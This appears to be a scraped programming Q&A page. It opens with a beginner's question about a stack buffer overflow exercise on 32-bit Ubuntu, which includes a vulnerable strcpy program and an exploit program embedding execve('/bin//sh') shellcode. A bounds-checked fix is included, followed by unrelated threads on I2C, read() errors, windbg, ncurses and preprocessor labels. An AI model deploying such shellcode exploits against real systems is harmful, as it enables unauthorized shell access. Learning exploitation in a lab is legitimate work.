Basic buffer overflow practice - ubuntu-11.10

I've been practicing some basic stack-based buffer overflow tasks recently
and I wrote a vulnerable program like this:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc,char **argv)
{
    if (argc<2) {
        puts("Need enough args!!");
        exit(0);
    }
    char buf[400];
    strcpy(buf,argv[1]);
    printf("Hi, %s\n",buf);
    return 0;
}
and the exploit program like this:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#define ATK_L 430
#define VUL_L 400
#define NOP_L 12
int main(){
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
                       "\x68\x68\x2f\x62\x69\x6e\x89"
                       "\xe3\x89\xc1\x89\xc2\xb0\x0b"
                       "\xcd\x80\x31\xc0\x40\xcd\x80";
    char *atk,vul[]="./vul1 ";
    atk=(char*)malloc(sizeof(char)*ATK_L);
    unsigned long i,ret,*ptr,ptr2;
    ret=(unsigned long)atk;
    ptr=(unsigned long*)atk;
    for(i=0;i<ATK_L;i+=4){
        *(ptr++)=ret;
    }
    for(i=0;i<NOP_L;i++){
        atk[i]='\x90';
    }
    ptr2=0;
    for(i=NOP_L;i<NOP_L+strlen(shellcode);i++){
        atk[i]=shellcode[ptr2++];
    }
    atk[ATK_L-1]='\0';
    strcat(vul,atk);
    system(vul);
    free(atk);
    return 0;
}
Since I don't want to determine the offset, I just jump back to the beginning of the atk array. I turned off ASLR and passed the -fno-stack-protector flag when compiling, but when I run the exploit program it just says core dump and does nothing! I used gdb to debug the exploit program and it said that it was killed in the getenv function, and I just can't understand why.
I work on Ubuntu 11.10, 32-bit.
Thanks a lot :-)
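
A bounds-checked counterpart to the vulnerable program above, as an added example that is not part of the original post. The helper name copy_checked and the BUF_L macro are assumptions made for this sketch; the helper rejects any argument that does not fit in the 400-byte buffer, terminator included, instead of letting strcpy write past it.

```c
#include <stdio.h>
#include <string.h>

#define BUF_L 400   /* same size as buf[] in the vulnerable program */

/* Copy src into dst (capacity cap, terminator included) only if it fits.
 * Returns 0 on success, -1 if an argument is invalid or src is too long.
 * Oversized input is rejected, not truncated, so the caller fails closed. */
int copy_checked(char *dst, size_t cap, const char *src)
{
    const char *end;
    size_t len;

    if (dst == NULL || src == NULL || cap == 0)
        return -1;
    end = memchr(src, '\0', cap);   /* stops at the NUL, never looks past cap */
    if (end == NULL)                /* no terminator within cap bytes */
        return -1;
    len = (size_t)(end - src);
    memcpy(dst, src, len + 1);      /* len + 1 <= cap, copies the NUL too */
    return 0;
}

int main(int argc, char **argv)
{
    char buf[BUF_L];

    if (argc < 2) {
        puts("Need enough args!!");
        return 1;
    }
    if (copy_checked(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_L - 1);
        return 1;
    }
    printf("Hi, %s\n", buf);
    return 0;
}
```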

Related

I2C C Programming Nothing Works

Here is my program:
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <err.h>
#include <errno.h>
#include <linux/types.h>
#include <linux/i2c.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define I2C_SLAVE 0x0703
int main(int argc, char **argv)
{
    uint8_t data, i2c_device_address = 0x21,
            i2c_register_address = 0x01;
    int file, rc;
    //Open I2C
    file = open("/dev/i2c-1", O_RDWR);
    if (file < 0)
        err(errno, "Tried to open /dev/i2c-1");
    // I want to work with I2C Register at I2C Address 0x12
    rc = ioctl(file, I2C_SLAVE, i2c_register_address);
    if (rc < 0)
        err(errno, "Tried to set device address '0x%02x'",
            i2c_device_address);
    // Read Content of I2C Register at I2C Address 0x12
    rc = read(file, &data, 1);
    if (rc < 0)
        err(errno, "Tried to read device at address '0x%02x'",
            i2c_device_address);
    // Print the Result
    // Expected (Default) Value = 0x80
    // What i got = 0x00
    printf("/dev/i2c-1: device 0x%02x at address 0x%02x: 0x%02x\n",
           i2c_device_address, i2c_register_address, data);
    // Terminal Output:
    // /dev/i2c-1: device 0x21 at address 0x01: 0x00
    return 0;
}
I have the OV7670 camera and I am trying to read some registers for warm-up.
But I always get the same result: 0x00.
The datasheet of the camera tells me that 0x80 is the default value for this register.
When my camera isn't even connected to my Raspberry Pi, it still prints the same output when I run my program. There are not even any errors.
I used the command i2cdetect -r 1 and I got correct output.
So the device must be OK and properly connected.
I want to know: how can I read and write to I2C registers with the basic Linux read, write & ioctl functions?
UPDATE
Now I check the return value of the read function and it says Remote I/O error.

The ioctl takes the device address as the third parameter, not the register:
rc = ioctl(file, I2C_SLAVE, i2c_device_address);
Then you need a write-read combination: first write the register you want to read, then do the read.
And you have to check the return value of the read. It needs to be 1 or the read failed.
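
The three corrections from the answer above, put together as an added example that is not code from the original posts. The helper name i2c_read_reg is an assumption; the bus path, device address 0x21, register 0x01 and the I2C_SLAVE value are the ones used in the question.

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>

#ifndef I2C_SLAVE
#define I2C_SLAVE 0x0703   /* same request number the question defines */
#endif

/* Read one 8-bit register through an open /dev/i2c-N descriptor.
 * dev is the 7-bit device address, reg the register index inside it.
 * Returns 0 and stores the byte in *val, or -1 on any failure
 * (errno is set when a system call failed). */
int i2c_read_reg(int fd, uint8_t dev, uint8_t reg, uint8_t *val)
{
    if (val == NULL)
        return -1;
    /* The third ioctl argument is the device address, not the register. */
    if (ioctl(fd, I2C_SLAVE, (unsigned long)dev) < 0)
        return -1;
    /* Write phase: tell the device which register we want. */
    if (write(fd, &reg, 1) != 1)
        return -1;
    /* Read phase: exactly 1 byte must come back, or the read failed. */
    if (read(fd, val, 1) != 1)
        return -1;
    return 0;
}

int main(void)
{
    uint8_t v;
    int fd = open("/dev/i2c-1", O_RDWR);   /* bus used in the question */

    if (fd < 0 || i2c_read_reg(fd, 0x21, 0x01, &v) < 0) {
        perror("i2c read");
        return 1;
    }
    printf("device 0x21 register 0x01: 0x%02x\n", v);
    close(fd);
    return 0;
}
```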

Different behavior of read

I'm trying to understand why this program returns different errors when I change the size of the buffer:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
int main()
{
    int file = open("./test",O_RDWR);
    //char buff[204796] = "" ; -> File Descriptor error (no seg fault)
    //char buff[100000]=""; -> Seg Fault
    char buff[208896]=""; // -> Bad Address (no seg fault)
    int i = 0;
    while(read(file,buff+i,2048) > 0)
    {
        i += 2048;
    }
    fprintf(stderr, "%s\n", strerror(errno));
}
Test is a file with 500000 A :)
When a Bad address or File descriptor error occurs, I don't know how to exploit this code.

So, bad access and segfaults aren't the same category. Bad access is thrown by the Mach-O system, while segfault is a POSIX signal; hence, segfault ∈ bad access (it can be thrown by other POSIX signals). I would suspect your error is stemming from your file size and/or the OS blocking you from taking that much memory. Look at your memory at the locations in the dump and see what is stored.
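
The loop in the question advances by 2048 on every pass and never compares the offset with the size of buff, so a 500000-byte file runs past the end of the array. A bounded version of that loop follows as an added example, not code from the original posts; the names read_bounded and CHUNK are assumptions.

```c
#include <errno.h>
#include <stdio.h>
#include <unistd.h>

#define CHUNK 2048   /* same request size as the loop in the question */

/* Fill buf (capacity cap) from fd until EOF or until the buffer is full.
 * Returns the number of bytes stored, or -1 on a read error (errno set).
 * *truncated becomes 1 when the input held more data than fit in buf. */
ssize_t read_bounded(int fd, char *buf, size_t cap, int *truncated)
{
    size_t used = 0;
    ssize_t n;
    char extra;

    *truncated = 0;
    while (used < cap) {
        size_t want = cap - used;
        if (want > CHUNK)
            want = CHUNK;              /* never request more than is left */
        n = read(fd, buf + used, want);
        if (n < 0 && errno == EINTR)
            continue;                  /* interrupted by a signal: retry */
        if (n < 0)
            return -1;                 /* real error: errno says which */
        if (n == 0)
            return (ssize_t)used;      /* EOF, everything fit */
        used += (size_t)n;             /* advance by what read() returned */
    }
    /* Buffer is full: probe one byte to tell an exact fit from overflow. */
    do {
        n = read(fd, &extra, 1);
    } while (n < 0 && errno == EINTR);
    if (n < 0)
        return -1;
    *truncated = (n == 1);
    return (ssize_t)used;
}

int main(void)
{
    static char buf[4096];
    int truncated;
    ssize_t got = read_bounded(STDIN_FILENO, buf, sizeof buf, &truncated);

    if (got < 0) { perror("read"); return 1; }
    printf("%zd bytes stored, truncated=%d\n", got, truncated);
    return 0;
}
```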

Very strange windbg behavior with WaitForSingleObject()

Below is my program, and I am trying to get the call stack when the process is blocked in the WaitForSingleObject() call using windbg. The strange thing is that when the process is blocking, windbg only prints out a very strange stack:
wow64cpu!TurboDispatchJumpAddressEnd+0x690
wow64cpu!TurboDispatchJumpAddressEnd+0x484
wow64!Wow64SystemServiceEx+0x1ce
wow64!Wow64LdrpInitialize+0x429
ntdll!RtlResetRtlTranslations+0x1b08
ntdll!RtlResetRtlTranslations+0xc63
ntdll!LdrInitializeThunk+0xe
// process2.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
HANDLE g_hWriteEvent;
int _tmain(int argc, _TCHAR* argv[])
{
    g_hWriteEvent = OpenEvent(
        EVENT_ALL_ACCESS,
        FALSE,
        TEXT("WriteEvent")
    );
    if (g_hWriteEvent == NULL) {
        printf("OpenEvent error (%d)\n", GetLastError());
        return 0;
    }
    // while (1);
    WaitForSingleObject(g_hWriteEvent, INFINITE);
    return 0;
}
Note that if I uncomment the while(1) line, then windbg can recognize that the process is blocking in the _tmain function.
Thanks.
Bin
Looks like that is a Wow64 32 bit process running on 64 bit OS. Make sure you attach the 64 bit Windbg to the process, not the 32 bit Windbg.

ncurses and stdin blocking

I have stdin in a select() set and I want to take a string from stdin whenever the user types it and hits Enter.
But select is triggering stdin as ready to read before Enter is hit, and, in rare cases, before anything is typed at all. This hangs my program on getstr() until I hit Enter.
I tried setting nocbreak() and it's perfect really except that nothing gets echoed to the screen so I can't see what I'm typing. And setting echo() doesn't change that.
I also tried using timeout(0), but the results of that were even crazier and didn't work.

What you need to do is to check if a character is available with the getch() function. If you use it in no-delay mode the method will not block. Then you need to eat up the characters until you encounter a '\n', appending each char to the resulting string as you go.
Alternatively, and this is the method I use, use the GNU readline library. It has support for non-blocking behavior, but documentation about that section is not so excellent.
Included here is a small example that you can use. It has a select loop, and uses the GNU readline library:
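#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <readline/readline.h>
#include <readline/history.h>
int quit = false;
/* Called by readline once a complete line has been entered. */
void rl_cb(char* line)
{
    if (NULL==line) {   /* EOF (Ctrl-D) */
        quit = true;
        return;
    }
    if(strlen(line) > 0) add_history(line);
    printf("You typed:\n%s\n", line);
    free(line);
}
int main()
{
    struct timeval to;
    fd_set rfds;
    const char *prompt = "# ";
    rl_callback_handler_install(prompt, (rl_vcpfunc_t*) &rl_cb);
    while(!quit){
        /* select() may modify both arguments, so set them up on every pass */
        FD_ZERO(&rfds);
        FD_SET(STDIN_FILENO, &rfds);
        to.tv_sec = 0;
        to.tv_usec = 10000;
        /* only hand a character to readline when stdin is readable */
        if (select(STDIN_FILENO + 1, &rfds, NULL, NULL, &to) > 0)
            rl_callback_read_char();
    }
    rl_callback_handler_remove();
    return 0;
}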
Compile with:
gcc -Wall rl.c -lreadline

How can I generate unique values in the C preprocessor?

I'm writing a bunch of related preprocessor macros, one of which generates labels which the other one jumps to. I use them in this fashion:
MAKE_FUNNY_JUMPING_LOOP(
    MAKE_LABEL();
    MAKE_LABEL();
)
I need some way to generate unique labels, one for each inner MAKE_LABEL call, with the preprocessor. I've tried using __LINE__, but since I call MAKE_LABEL inside another macro, they all have the same line and the labels collide.
What I'd like this to expand to is something like:
MAKE_FUNNY_JUMPING_LOOP(
    my_cool_label_1: // from first inner macro
    ...
    my_cool_label_2: // from second inner macro
    ...
)
Is there a way to generate hashes or auto-incrementing integers with the preprocessor?
If you're using GCC or MSVC, there is __COUNTER__.
Other than that, you could do something vomit-worthy, like:
#ifndef USED_1
#define USED_1
1
#else
#ifndef USED_2
#define USED_2
2
/* many many more */
#endif
#endif
I use this:
#define MERGE_(a,b) a##b
#define LABEL_(a) MERGE_(unique_name_, a)
#define UNIQUE_NAME LABEL_(__LINE__)
int main()
{
    int UNIQUE_NAME = 1;
    return 0;
}
... and get the following:
int main()
{
    int unique_name_8 = 1;
    return 0;
}
As others noted, __COUNTER__ is the easy but nonstandard way of doing this.
If you need extra portability, or for other cool preprocessor tricks, the Boost Preprocessor library (which works for C as well as C++) will work. For example, the following header file will output a unique label wherever it's included.
#include <boost/preprocessor/arithmetic/inc.hpp>
#include <boost/preprocessor/cat.hpp>
#include <boost/preprocessor/slot/slot.hpp>
#if !defined(UNIQUE_LABEL)
#define UNIQUE_LABEL
/* first inclusion: start the counter in slot 1 at 1 */
#define BOOST_PP_VALUE 1
#include BOOST_PP_ASSIGN_SLOT(1)
#undef BOOST_PP_VALUE
#else
/* later inclusions: increment the value stored in slot 1 */
#define BOOST_PP_VALUE BOOST_PP_INC(BOOST_PP_SLOT(1))
#include BOOST_PP_ASSIGN_SLOT(1)
#undef BOOST_PP_VALUE
#endif
BOOST_PP_CAT(my_cool_label_, BOOST_PP_SLOT(1)):
Sample:
int main(int argc, char *argv[]) {
#include "unique_label.h"
    printf("%x\n", 1234);
#include "unique_label.h"
    printf("%x\n", 1234);
#include "unique_label.h"
    return 0;
}
preprocesses to
int main(int argc, char *argv[]) {
my_cool_label_1:
    printf("%x\n", 1234);
my_cool_label_2:
    printf("%x\n", 1234);
my_cool_label_3:
    return 0;
}
I can't think of a way to automatically generate them but you could pass a parameter to MAKE_LABEL:
#define MAKE_LABEL(n) my_cool_label_##n:
Then...
MAKE_FUNNY_JUMPING_LOOP(
    MAKE_LABEL(0);
    MAKE_LABEL(1);
)
You could do this:
#define MAKE_LABEL() \
    do { \
    my_cool_label: \
        /* some stuff */; \
        goto my_cool_label; \
        /* other stuff */; \
    } while (0)
This keeps the scope of the label local, allowing any number of them inside the primary macro.
If you want the labels to be accessed more globally, it's not clear how your macro "MAKE_FUNNY_JUMPING_LOOP" references these labels. Can you explain?
It doesn't seem possible with a standard preprocessor, although you could fake it out by putting parameters within MAKE_LABEL or MAKE_FUNNY_JUMPING_LOOP, and use token pasting to create the label.
There's nothing preventing you from making your own preprocessing script that does the automatic increment for you. However, it won't be a standard C/C++ file in that case.
A list of commands available: http://www.cppreference.com/wiki/preprocessor/start